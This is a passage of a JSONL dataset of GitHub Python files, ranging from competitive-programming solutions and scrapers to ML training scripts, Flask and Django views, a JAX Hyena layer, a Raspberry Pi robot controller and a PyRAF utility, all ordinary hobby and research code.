servings\nprint(ingredients.text + SPACER) # Prints retrieved ingredient list\nprint(method.text + END) # Prints retrieved cooking instructions\n\ndriver.quit() # Halts Chromedriver. Pretty self-explanatory\n","repo_name":"jacobh7/recipe_scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14370728910","text":"# -*- coding: utf-8 -*-\n# Input#\nimport math\n\n# n = int(input())\nN, M = map(int, input().split())\na = list(map(int, input().split()))\nb = list(map(int, input().split()))\nINF = 100000000000\nans = 0\n\n\ndef check(a, b):\n ans = 0\n for i in range(len(a)):\n if a[i] != b[i]:\n ans += 1\n return ans\n\n\ndef diffcheck(a, b):\n ans = INF\n diff = len(a) - len(b)\n if diff == 1:\n for i in range(len(a)):\n ans = min(check(a[0:i] + a[i + 1 :], b), ans)\n else:\n for i in range(len(a)):\n ans = min(diffcheck(a[0:i] + a[i + 1 :], b), ans)\n return ans + 1\n\n\nif len(a) == len(b):\n ans = check(a, b)\nelse:\n if len(a) < len(b):\n tmp = a\n a = b\n b = tmp\n ans = diffcheck(a, b)\n\nprint(\"{}\".format(ans))\n","repo_name":"katataku/atcoder","sub_path":"Contest/ABC185/e/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19002933268","text":"from functools import lru_cache\n\n\nclass Solution:\n def numSquarefulPerms(self, A: \"List[int]\") -> \"int\":\n l = len(A)\n out = [0] # global variable to keep track of total number of permutations\n c = dict(collections.Counter(A)) # element - counts\n s = [] # stack\n\n @lru_cache(maxsize=None)\n def is_square(s):\n return int(math.sqrt(s)) ** 2 == s\n\n def dfs(stack, counts):\n if len(stack) == l:\n out[0] += 1\n return\n # keep track of options to avoid duplicate steps\n options = [k for k, v in counts.items() if v > 0]\n for o in options:\n # can take a step if the stack is empty\n # or the tip of the stack + option is square\n if len(stack) == 0 or is_square(stack[-1] + o):\n # dfs + backtrack\n counts[o] -= 1\n stack.append(o)\n dfs(stack, counts)\n stack.pop()\n counts[o] += 1\n\n dfs(s, c)\n return out[0]\n","repo_name":"devilhtc/leetcode-solutions","sub_path":"0x03e4_996.Number_of_Squareful_Arrays/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"3975573670","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\n\n#Cargar el conjunto de datos\ndata = pd.read_csv('german_credit.csv', sep=',', decimal='.')\n\n#Dividir el conjunto de datos aleatoriamente en dos partes, el conjunto de entrenamiento y elconjunto de prueba\ntrain, test = train_test_split(data, test_size=0.1, random_state=42)\n\n#change all categorical variables to integer\ntrain = train.apply(lambda x: pd.factorize(x)[0])\ntest = test.apply(lambda x: pd.factorize(x)[0])\n\n\n#1. crear el modelo\nmodelo = RandomForestClassifier(n_estimators=100, random_state=40)\n\n\n\n#2. entrenar el modelo\nmodelo.fit(train.drop('Creditability', axis=1), train['Creditability'])\n\n#3. predecir\nprediccion_train = modelo.predict(train.drop('Creditability', axis=1))\nprediccion_test = modelo.predict(test.drop('Creditability', axis=1))\n\n#4. calcular la precision\nprecision_train = sum(prediccion_train == train['Creditability']) / len(train) * 100\nprecision_test = sum(prediccion_test == test['Creditability']) / len(test) * 100\n\nprint('Precision del conjunto de entrenamiento: ', precision_train)\nprint('Precision del conjunto de prueba: ', precision_test)\n\n\n\n\n#2. matriz de confusion para Random Forest\nmatriz_confusion = confusion_matrix(test['Creditability'], prediccion_test)\n#en porcentaje\nmatriz_confusion = matriz_confusion / len(test) * 100\n\nprint('Matriz de confusion para Random Forest: \\n', matriz_confusion)\n\n\n\n\n#2. grafico de curvas de precision para Random Forest\n\"\"\"\nprecision_train = []\nprecision_test = []\nnodos = []\n\nfor i in range(1, 10):\n modelo = RandomForestClassifier(n_estimators=i, random_state=0)\n modelo.fit(train.drop('Creditability', axis=1), train['Creditability'])\n prediccion_train = modelo.predict(train.drop('Creditability', axis=1))\n prediccion_test = modelo.predict(test.drop('Creditability', axis=1))\n precision_train.append(sum(prediccion_train == train['Creditability']) / len(train) * 100)\n precision_test.append(sum(prediccion_test == test['Creditability']) / len(test) * 100)\n nodos.append(i)\n\nplt.plot(nodos, precision_train, label='Conjunto de entrenamiento')\n\nplt.plot(nodos, precision_test, label='Conjunto de prueba')\n\nplt.xlabel('Cantidad de nodos')\nplt.ylabel('Precision')\nplt.title('Curva de precision para Random Forest')\nplt.legend()\nplt.show()\n\"\"\"\n","repo_name":"papekoja/72.75-ML","sub_path":"TP2/random_forest.py","file_name":"random_forest.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3256020198","text":"from sqlmodel import SQLModel, Session, create_engine\nfrom app.config import get_setting\n\nsetting = get_setting()\ndb_url = setting.db_url\nengine = create_engine(db_url, connect_args={'check_same_thread': False})\n\n\ndef create_db_and_tables():\n SQLModel.metadata.create_all(engine)\n\n\ndef get_session():\n with Session(engine) as session:\n yield session\n","repo_name":"ibrahim4529/fastapi-auth-rest","sub_path":"app/db/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6832851257","text":"from Crypto.Cipher import Blowfish\nfrom struct import pack\n\n# MSG MUST BE A STRING\ndef bf_enc(msg,key):\n if(type(msg) != bytes):\n encoded=msg.encode('utf-8')\n msg = bytearray(encoded)\n if(type(key) != bytes):\n encoded=key.encode('utf-8')\n key = bytearray(encoded)\n bs = Blowfish.block_size\n cipher = Blowfish.new(key, Blowfish.MODE_CBC)\n\n plen = bs - len(msg) % bs\n padding = [plen]*plen\n padding = pack('b'*plen, *padding)\n c_text = cipher.iv + cipher.encrypt(msg + padding)\n return c_text\n\n# CTEXT MUST BE A BYTE ARRAY\ndef bf_dec(c_text,key):\n bs = Blowfish.block_size\n iv = c_text[:bs]\n c_text = c_text[bs:]\n\n cipher = Blowfish.new(key, Blowfish.MODE_CBC, iv)\n msg = cipher.decrypt(c_text)\n\n last_byte = msg[-1]\n msg = msg[:- (last_byte if type(last_byte) is int else ord(last_byte))]\n return msg.decode(encoding=\"unicode_escape\")\n\nkey = b\"this is a big stuff that is important\"\n\n\n","repo_name":"amyyyth/audio-stegano-blowfish","sub_path":"blowfish.py","file_name":"blowfish.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"25803124063","text":"from tensorflow.keras import *\nfrom tensorflow.keras.layers import *\n\n\ndef cnn(num_classes, heigth, width, channels):\n \"\"\"\n\n :param num_classes: Number of classes to classify\n :param heigth: Height of images\n :param width: Width of images\n :param channels: The number of channels of images (3 if rgb)\n :return: model\n \"\"\"\n\n input_shape = (heigth, width, channels)\n\n model = Sequential()\n model.add(Conv2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape, strides=1))\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.5))\n model.add(Flatten())\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(num_classes, activation='softmax'))\n\n return model\n","repo_name":"caim03/ImageClassification","sub_path":"model/custom_cnn.py","file_name":"custom_cnn.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27919928100","text":"#!/usr/bin/env python3\n# Memorise Me!!!\n# solved by: Himanshu Shekhar\n\nx, y = map(int, input().split())\n\narr = [[]]\n\nfor i in range(x):\n for j in range(y):\n arr.append([i[j]])\n\nprint(arr)\n","repo_name":"palhiman/Lab-Practices","sub_path":"dataStructure/transpose.py","file_name":"transpose.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73376488141","text":"import csv\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nurl = 'https://guide.michelin.com/us/en/restaurants/'\n\nmichelin_urls = {\n \"3-stars-michelin\": 7,\n \"2-stars-michelin\": 25,\n \"1-star-michelin\": 138,\n \"bib-gourmand\": 169,\n \"sustainable_gastronomy\": 22\n}\n\nfor entry in michelin_urls.items():\n level = entry[0]\n pages = entry[1]\n request_url = url + level\n i = 1\n all_entries = []\n\n while i <= pages:\n\n response = requests.get(url=request_url)\n\n soup = BeautifulSoup(response.content, 'html.parser')\n restaurants = soup.find_all('div', attrs={\"class\": \"card__menu-content\"})\n\n for restaurant in restaurants:\n # michelin_award = restaurant.find('img', attrs={\"class\": \"michelin-award\"})\n # award_type = michelin_award['src']\n # right_index = award_type.rfind('.')\n # left_index = award_type.find('/')\n # award = award_type[left_index, right_index]\n\n restaurant_title = restaurant.find('h3', attrs={\"class\": \"card__menu-content--title\"})\n title = restaurant_title.text.strip()\n\n restaurant_location = restaurant.find('div', attrs={\"class\": \"card__menu-footer--location\"})\n location = restaurant_location.text.strip()\n\n restaurant_cuisine = restaurant.find('div', attrs={\"class\": \"card__menu-footer--price\"})\n cuisine_raw = restaurant_cuisine.text\n\n cuisine_index = cuisine_raw.rfind('·')\n if cuisine_index == -1:\n cuisine = cuisine_raw.strip()\n else:\n cuisine = cuisine_raw[cuisine_index + 1:]\n cuisine = cuisine.strip()\n\n\n entry = [level, location, title, cuisine]\n print(entry)\n all_entries.append(entry)\n\n i += 1\n\n if i == 2:\n request_url = request_url + '/page/'\n else:\n request_url = request_url[:request_url.rfind('/') + 1]\n\n request_url = request_url + str(i)\n\n with open('michelin.csv', 'a', encoding=\"utf-8\", newline='') as file:\n writer = csv.writer(file)\n writer.writerows(all_entries)\n\n all_entries = []\n","repo_name":"joegramstad/buckit_tooling","sub_path":"web_scrapers/michelin_scraper.py","file_name":"michelin_scraper.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"36630715777","text":"# Question_Link = https://platform.stratascratch.com/coding/10353-workers-with-the-highest-salaries?code_type=2\n\n# Import your libraries\nimport pandas as pd\n\ndf_merge = worker.merge(title, left_on='worker_id', right_on='worker_ref_id')\n\ndf_max_salary = df_merge[df_merge['salary'] == df_merge['salary'].max()]\n\nresult = df_max_salary['worker_title']\n","repo_name":"Ateeth/Data-Science-Interview-Questions","sub_path":"Coding/Medium/Workers-With-The-Highest-Salaries-10353.py","file_name":"Workers-With-The-Highest-Salaries-10353.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"21159777956","text":"#!/usr/bin/env python\nimport string\n\n\ndef create_decode_dict():\n priorities = {}\n for k, v in zip(list(string.ascii_lowercase), range(1, 27)):\n priorities[k] = v\n for k, v in zip(list(string.ascii_uppercase), range(27, 53)):\n priorities[k] = v\n return priorities\n\n\ndef calculate_score_part1(errors, priorities):\n score = 0\n for e in errors:\n score += priorities[e]\n return score\n\ndef calculate_score_part2(errors, priorities):\n score = 0\n for e in [item for sublist in errors for item in sublist]:\n score += priorities[e]\n return score\n\ndef find_same_item(errors):\n return list(set.intersection(*map(set, errors)))\n\n\ndef solve():\n errors_part1 = []\n errors_part2 = []\n priorities = create_decode_dict()\n group_of_three = []\n with open(\"day3_input\", \"r\") as f:\n for line in f: \n letters = [l for l in line.strip()]\n errors_part1.append(find_same_item([letters[:len(letters)//2], letters[len(letters)//2:]])[0])\n if len(group_of_three) == 3:\n errors_part2.append(find_same_item(group_of_three))\n group_of_three = []\n group_of_three.append(letters)\n errors_part2.append(find_same_item(group_of_three))\n \n return calculate_score_part1(errors_part1, priorities), calculate_score_part2(errors_part2, priorities)\n\ndef day3():\n results = solve()\n print(\"Part 1: \", results[0])\n print(\"Part 2: \", results[1])\n\nday3()","repo_name":"natnordmoen/aoc2022","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16380064902","text":"from flask import *\nfrom flask_login import current_user\n\nfrom attendance import db\nfrom attendance.constant.appConstant import *\nfrom attendance.department.forms import AddDepartmentForm\nfrom attendance.models import Department\n\ndetail_department = Blueprint('detail_department', __name__)\n\n\n@detail_department.route('/department-detail', methods=[Constant.POST, Constant.GET])\ndef department_details():\n depart = Department.query.filter_by(company_id=current_user.company_name).all()\n fav_icon = url_for('static', filename='RegisterLogin/images/icons/all_department.png')\n return render_template('department_details.html', depart=depart, fav_icon=fav_icon, title=Constant.DEPARTMENT)\n\n\n@detail_department.route('/delete-department/', methods=[Constant.GET, Constant.POST])\ndef delete_department(id):\n depart = Department.query.filter_by(id=id).first()\n db.session.delete(depart)\n db.session.commit()\n flash(f'{Constant.DELETE_DEPARTMENT}', f'{Constant.SUCCESS_FLASH_MESSAGE}')\n return redirect(url_for('detail_department.department_details'))\n\n\n@detail_department.route('/update-department/', methods=[Constant.GET, Constant.POST])\ndef update_department(id):\n depart = Department.query.filter_by(id=id).first()\n form = AddDepartmentForm()\n if form.validate_on_submit():\n depart.department_name = form.department_name.data\n db.session.commit()\n flash(f'{Constant.UPDATE_DEPARTMENT}', f'{Constant.SUCCESS_FLASH_MESSAGE}')\n return redirect(url_for('detail_department.department_details'))\n form.department_name.data = depart.department_name\n fav_icon = url_for('static', filename='RegisterLogin/images/icons/all_department.png')\n return render_template('add_department.html', depart=depart, title=FormTitlesConstant.ALL_DEPARTMENT,\n fav_icon=fav_icon, form=form, span='Update Department')\n","repo_name":"salman036/Employee-Ams","sub_path":"attendance/department_detail/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"71515823183","text":"#!/usr/bin/env python\n\"\"\"Training script of the best model \"\"\"\n\nimport time\nfrom pathlib import Path\n\nimport click\nimport joblib\nfrom sklearn import metrics\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.svm import LinearSVC\n\nfrom utils import read_corpus\n\n\n@click.command()\n@click.option('-tf', '--train_file', default=Path('datasets/train.txt'), type=click.Path(exists=True, file_okay=True, dir_okay=False, readable=True, path_type=Path), help='Train file to learn from')\n@click.option('-ttf', '--test_file', default=Path('datasets/test.txt'), type=click.Path(exists=True, file_okay=True, dir_okay=False, readable=True, path_type=Path), help='Test data file')\n@click.option('-m', '--model_file', default=Path('model/pipeline.pkl'), type=click.Path(file_okay=True, dir_okay=False, writable=True, path_type=Path), help='Save model to file')\ndef main(\n train_file: Path,\n test_file: Path,\n model_file: Path,\n) -> None:\n X_train, y_train = read_corpus(train_file)\n X_test, y_test = read_corpus(test_file)\n\n pipeline = Pipeline([\n ('vec', TfidfVectorizer(ngram_range=(1, 2), stop_words='english', sublinear_tf=True)),\n ('cls', LinearSVC(C=0.5885398838335058, intercept_scaling=0.6329639882756152,\n max_iter=2000, multi_class='crammer_singer', random_state=42,\n tol=0.009741897651227838))\n ])\n\n print('Training...')\n _training_start_time = time.time()\n pipeline.fit(X_train, y_train)\n training_time = time.time() - _training_start_time\n print(f' time spent: {training_time:.2f}s')\n train_f1 = metrics.f1_score(y_train, pipeline.predict(X_train), average='micro')\n print(f' f1-micro train score: {train_f1:.4f}')\n\n print('Validate model...')\n test_predict = pipeline.predict(X_test)\n test_f1 = metrics.f1_score(y_test, test_predict, average='micro')\n test_recall = metrics.recall_score(y_test, test_predict, average='micro')\n test_precision = metrics.precision_score(y_test, test_predict, average='micro')\n test_accuracy = metrics.accuracy_score(y_test, test_predict)\n print(f' f1-micro test score: {test_f1:.4f}')\n print(f' recall-micro test score: {test_recall:.4f}')\n print(f' precision-micro test score: {test_precision:.4f}')\n print(f' accuracy test score: {test_accuracy:.4f}')\n\n if model_file:\n print(f'Saving model to {model_file}...')\n joblib.dump(pipeline, model_file)\n print(' done')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lct-rug-2022/lft-assignment-1","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37786533376","text":"#!/usr/bin/env python\n# -*- vim: expandtab tabstop=4 shiftwidth=4 smarttab autoindent\n\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.http import Http404\n\nfrom ui.models import *\n\n\ndef nodelist(request, path=\"\", id=None, attr=\"\"):\n item = MetaClass.data\n root = MetaClass.root\n steps = [x for x in path.split('/') if x]\n try:\n for step in steps:\n root = root._DOMD.children[step]\n except (KeyError, AttributeError):\n raise Http404\n if not (root is MetaClass.root):\n item = get_object_or_404(root, pk=id)\n # generamos los \"breadcrumbs\" que nos traen hasta aqui\n crumbs = []\n brpath, britem, brattr = steps, item, attr\n while brpath:\n crumbs.append((\"/\"+\"/\".join(brpath), britem, brattr))\n brattr = brpath.pop()\n if brpath:\n britem = britem.up\n # el ultimo breadcrumb: el objeto de datos.\n crumbs.append((None, None, brattr))\n crumbs = reversed(crumbs)\n # preparamos el contexto\n data = None if not attr else getattr(item, attr)\n if data:\n # HACK\n class tmp(object):\n def __init__(self, data):\n self.data = data\n self._type = data._type\n def __iter__(self):\n for x in self.data:\n yield x\n for x in range(0, 100):\n yield None\n data = tmp(data)\n subpath = '/'.join((path, attr))\n return render_to_response('nodelist.html', {\n 'customer': 'Demo',\n 'provider': 'NextiraOne',\n 'path': path,\n 'subpath': subpath,\n 'parent': item,\n 'parent_meta': root._DOMD,\n 'attr': attr,\n 'data': data,\n 'data_meta': data._type._DOMD,\n 'crumbs': crumbs\n })\n\n","repo_name":"rjrivero/Plantiweb","sub_path":"ui/views/nodelist.py","file_name":"nodelist.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22817041142","text":"import jax\nfrom jax import numpy as jnp\nfrom flax import linen as nn\n\nfrom einops import rearrange\n\n\ndef fftconv(seq, filter, bias):\n \"\"\"Batched convolution of seq and filter using FFT.\n Args:\n seq: Input sequence. (b, l, d)\n filter: Filter to convolve with. (l, d)\n bias: Bias to multiply with seq. (d,)\n \"\"\"\n seq_len = seq.shape[-2]\n\n # Pad sequence and filter to be able to slice result up to seq_len (see below).\n fft_size = 2*seq_len\n filter_f = jnp.fft.rfft(filter, n=fft_size, axis=-2) / fft_size\n seq_f = jnp.fft.rfft(seq, n=fft_size, axis=-2)\n\n # Discard results after seq_len to preserve causality.\n y = jnp.fft.irfft(seq_f * filter_f, n=fft_size, norm='forward', axis=-2)[..., :seq_len, :]\n\n out = y + seq * bias\n\n return out\n\n\nclass ExponentialModulation(nn.Module):\n \"\"\"Exponentially modulate a matrix along its temporal/sequence dimension.\"\"\"\n fast_decay_pct: float = 0.3\n slow_decay_pct: float = 1.5\n target: float = 1e-2\n shift: float = 0.0\n\n @nn.compact\n def __call__(self, t, x):\n \"\"\"Modulate x using time/sequence values in t.\n Args:\n t: time/position values to modulate with. (l, 1) \n x: input. (..., l, d)\n \"\"\"\n in_dim = x.shape[-1]\n max_decay = jnp.log(self.target) / self.fast_decay_pct\n min_decay = jnp.log(self.target) / self.slow_decay_pct\n deltas = jnp.linspace(min_decay, max_decay, in_dim) # (d,)\n\n decay = jnp.exp(-t * jnp.abs(deltas)) # (l, d)\n out = x * (decay + self.shift)\n return out\n\n\nclass HyenaFilter(nn.Module):\n \"\"\"Create implicit filters from positional embeddings.\"\"\"\n mlp_width: int # Width of implicit MLP.\n layers: int # Number of filter layers.\n n_filters: int # Number of filters to create. Usually (order-1)*d\n init_freq: float = 1.0 # Frequency to initialize sine activation with.\n\n @nn.compact\n def __call__(self, embeds):\n k = nn.Dense(self.mlp_width, name='filter_in')(embeds)\n\n freq = self.param(\n 'freq',\n lambda rng, init_freq: jnp.full(self.mlp_width, init_freq),\n self.init_freq\n )\n\n k = jnp.sin(freq * k)\n\n for _ in range(self.layers):\n k = nn.Dense(self.mlp_width)(k)\n k = jnp.sin(freq * k)\n \n k = nn.Dense(self.n_filters, use_bias=False, name='filter_out')(k) # (l, (o-1)*d)\n\n return k\n\n\nclass PosEmbeddings(nn.Module):\n \"\"\"Create positional embeddings for a sequence of a certain maximum length.\"\"\"\n max_len: int # Maximum length of the sequence.\n pos_embed_dim: int # Positional embedding dimension.\n\n @nn.compact\n def __call__(self, l):\n t = jnp.linspace(0, 1, self.max_len)[:l, None] # (l, 1)\n\n # Initialization function for positional embeddings.\n def z_init(rng, l, t):\n assert self.pos_embed_dim % 2 == 1, \"Positional embedding dimension must be odd (1 + real + imag).\"\n\n bands = (self.pos_embed_dim - 1) // 2\n t_rescaled = jnp.linspace(0, self.max_len-1, self.max_len)[:l, None] # (l, 1)\n w = 2 * jnp.pi * t_rescaled / l\n \n f = jnp.linspace(1e-4, bands-1, bands)[None] # (1, bands)\n z = jnp.exp(-1j * f * w) # (l, bands)\n z = jnp.concatenate([t, z.real, z.imag], axis=-1) # (l, 1+pos_embed_dim)\n\n return z\n\n z = self.param(\n 'z',\n z_init,\n l, t\n )\n\n return z, t\n\n\nclass HyenaOperator(nn.Module):\n \"\"\"Apply a Hyena operator to a given sequence.\"\"\"\n max_len: int # Maximum sequence length.\n d_model: int # Width of Hyena layer.\n pos_embed_dim: int # Position embedding dimension.\n filter_features: int # Implicit filter dimension.\n num_filter_layers: int # Number of filter creation layers.\n order: int = 2 # Depth of Hyena recurrence.\n init_freq: float = 1.0 # Initial sine activation frequency.\n dropout: float = 0.0 # Dropout rate.\n \n @nn.compact\n def __call__(self, u, train=True):\n # u: (b, l, embed_dim)\n\n l = min(u.shape[-2], self.max_len)\n\n z, t = PosEmbeddings(self.max_len, self.pos_embed_dim)(l) # z: (l, 1+pos_embed_dim), t: (l, 1)\n n_filters = (self.order-1)*self.d_model\n filters = HyenaFilter(self.filter_features, self.num_filter_layers, n_filters, self.init_freq)(z) # (l, (o-1)*d)\n \n filters = rearrange(filters, 'l (o d) -> o l d', o=self.order-1)\n filters = ExponentialModulation()(t, filters)\n\n # number of projections = self.order * x and one v\n n_projs = (self.order+1)*self.d_model\n u = nn.Dense(n_projs)(u) # (b, l, (o+1)*d)\n \n # depthwise 1d conv\n uc = nn.Conv(\n n_projs,\n kernel_size=(3,),\n padding='CAUSAL',\n feature_group_count=n_projs,\n )(u)\n \n *x, v = jnp.split(uc, self.order+1, axis=-1) # o * (b, l, d), (b, l, d)\n\n # learned bias\n bias = self.param(\n 'bias',\n nn.initializers.normal(stddev=1), # stddev=1 to replicate torch init\n (self.order-1, self.d_model)\n )\n\n # Sequential application of pointwise multiplication with projection and convolution with implicit filter.\n for o, k_i in enumerate(filters):\n v = v * x[o]\n v = nn.Dropout(self.dropout)(v, deterministic=not train)\n v = fftconv(v, k_i, bias[o])\n\n y = v * x[-1]\n y = nn.Dropout(self.dropout)(y, deterministic=not train)\n\n y = nn.Dense(self.d_model)(y)\n\n return y","repo_name":"rbflx/hyena_jax","sub_path":"hyena.py","file_name":"hyena.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"28709004572","text":"import RPi.GPIO as GPIO\nfrom distance_monitor import *\nimport led_controller\nimport thread\n\n#when to turn away from an object that is sensed, in meters\nturn_distance = .5\n# seconds it takes to turn 90 degrees\nninety_deg_turn= .3\n\n\n#left and right motor both have two controls\n#set motors to different pins\nleft1=6\nleft2=13\nright1=19\nright2=26\n\n#set pin output mode\nGPIO.setmode(GPIO.BCM)\n\n#set up pins\nGPIO.setup(left1, GPIO.OUT)\nGPIO.setup(left2, GPIO.OUT)\nGPIO.setup(right1, GPIO.OUT)\nGPIO.setup(right2, GPIO.OUT)\n\n#direction to go forward\ndef goForward():\n GPIO.output(left1, False)\n GPIO.output(left2, True)\n GPIO.output(right1, False)\n GPIO.output(right2, True)\n\n#direction to go backward\ndef goBackward():\n GPIO.output(left1, True)\n GPIO.output(left2, False)\n GPIO.output(right1, True)\n GPIO.output(right2, False)\n\n#direction to turn left\ndef turnLeft():\n GPIO.output(left1, True)\n GPIO.output(left2, False)\n GPIO.output(right1, False)\n GPIO.output(right2, True)\n\n#direction to turn right\ndef turnRight():\n GPIO.output(left1, False)\n GPIO.output(left2, True)\n GPIO.output(right1, True)\n GPIO.output(right2, False)\n\n#direction to stop\ndef stop():\n GPIO.output(left1, False)\n GPIO.output(left2, False)\n GPIO.output(right1, False)\n GPIO.output(right2, False)\n\n#switch variables to not check same directions too much\n\n\n#sends robot to randomly explore, working with the ultrasonic radar to see if it is too close to walls\ndef explore():\n #check if distance is okay to move forward\n\n goBackward()\n\n\n while getBackwardDistance() > turn_distance:\n # if it is move forward and turn green light on\n continue\n\n # if in front there is an obstacle, turn right, check again\n slow_turn(True)\n\n if getBackwardDistance() > turn_distance:\n explore()\n else:\n\n # if to the right is also covered, turn all the way around and check original left\n # if its clear go back to explore\n slow_turn(False)\n slow_turn(False)\n time.sleep(ninety_deg_turn*2)\n if getBackwardDistance() > turn_distance:\n explore()\n else:\n\n slow_turn(False)\n explore()\n\ndef slow_turn(direction):\n i=0\n if direction==True:\n for i in range(5):\n turnRight()\n time.sleep(.05)\n stop()\n else:\n for i in range(5):\n turnLeft()\n time.sleep(.05)\n stop()\n\ndef control_lights():\n while 1:\n time.sleep(.1)\n led_controller.setGreen(False)\n led_controller.setRed(False)\n led_controller.setYellow(False)\n\n d = getForwardDistance()\n if d < turn_distance:\n led_controller.setRed(True)\n elif d < 2*turn_distance:\n led_controller.setYellow(True)\n else:\n led_controller.setGreen(True)\n\ndef start_led_controller():\n thread.start_new_thread( control_lights())\n\n#start_led_controller()\n","repo_name":"stulich/RaspberryPi-Voice-Controller","sub_path":"directions.py","file_name":"directions.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"19003253226","text":"\"\"\"Contains python routines to do special Window manipulations not\npossible in tkinter.\nThese are python stubs that are overloaded by a c version implementations.\nIf the c versions do not exist, then these routines will do nothing\n\n\"\"\"\n\n\nimport struct\nimport sys\nimport os\nimport fcntl\n\n\n# empty placeholder versions for X\ndef getFocalWindowID():\n return None\n\n\ndef drawCursor(WindowID, x, y, w, h):\n pass\n\n\ndef moveCursorTo(WindowID, rx, ry, x, y):\n pass\n\n\ndef setFocusTo(WindowID):\n pass\n\n\ndef setBackingStore(WindowID):\n pass\n\n\ndef getPointerPosition(WindowID):\n pass\n\n\ndef getWindowAttributes(WindowID):\n pass\n\n\ndef getParentID(WindowID):\n pass\n\n\ndef getDeepestVisual():\n return 24\n\n\ndef initGraphics():\n pass\n\n\ndef closeGraphics():\n pass\n\n\n# On OSX, a terminal with no display causes us to fail pretty abruptly:\n# \"INIT_Processeses(), could not establish the default connection to the WindowServer.Abort\".\n# Give the user (Mac or other) a way to still run remotely with no display.\nfrom .tools import capable\n_skipDisplay = not capable.OF_GRAPHICS\n\n# Are we on MacOS X ? Windows ?\nWUTIL_ON_MAC = sys.platform == 'darwin'\nWUTIL_ON_WIN = sys.platform.startswith('win')\n\n# WUTIL_USING_X: default to using X on most platforms, tho surely not on windows\nWUTIL_USING_X = not WUTIL_ON_WIN\n\n# More on this for OSX: for now we support both versions (X or Aqua) on OSX\n# Allow environment variable so any user can force their preference.\nif WUTIL_ON_MAC and not _skipDisplay:\n # default to aqua as it is the 98% case now (post v2.1.9), X11 users will need the env. var\n WUTIL_USING_X = 'PYRAF_WUTIL_USING_X' in os.environ\n\n# Experimental new (2012) mode some have requested (OSX mostly) where all\n# graphics windows drawn are popped to the foreground and left there with\n# the focus (focus not placed back onto terminal). Except the splash win.\nGRAPHICS_ALWAYS_ON_TOP = 'PYRAF_GRAPHICS_ALWAYS_ON_TOP' in os.environ\n\n# attempt to override with xutil or aqua versions\n_has_aqutil = 0\n_has_xutil = 0\ntry:\n if WUTIL_USING_X and not _skipDisplay:\n # set an env var before importing xutil (see PyRAF FAQ on this)\n os.environ['XLIB_SKIP_ARGB_VISUALS'] = '1'\n from . import xutil\n # initGraphics = initXGraphics\n xutil.initXGraphics() # call here for lack of a better place for n\n\n # Check to make sure a valid XWindow ID was initialized\n # Attach closeGraphics to XWindow methods\n # ONLY if an XWindow was successfully initialized.\n # WJH (10June2004)\n if xutil.getFocalWindowID() == -1:\n raise OSError()\n\n # Successful intialization. Reset dummy methods with\n # those from 'xutil' now.\n from pyraf.xutil import *\n _has_xutil = 1 # Flag to mark successful initialization of XWindow\n closeGraphics = closeXGraphics\n\n else:\n # Start with a basic empty non-X implementation (e.g. Cygwin?, OSX, ?)\n def getWindowIdZero():\n return 0\n\n getFocalWindowID = getWindowIdZero\n\n # If on OSX w/out X11, use aqutil\n if WUTIL_ON_MAC and not _skipDisplay: # as opposed to the PC (future?)\n try:\n from . import aqutil\n # override the few Mac-specific functions needed\n from .aqutil import getFocalWindowID, setFocusTo, getParentID\n from .aqutil import moveCursorTo, getPointerPosition\n _has_aqutil = 1\n except ImportError:\n _has_aqutil = 0\n print(\"Could not import 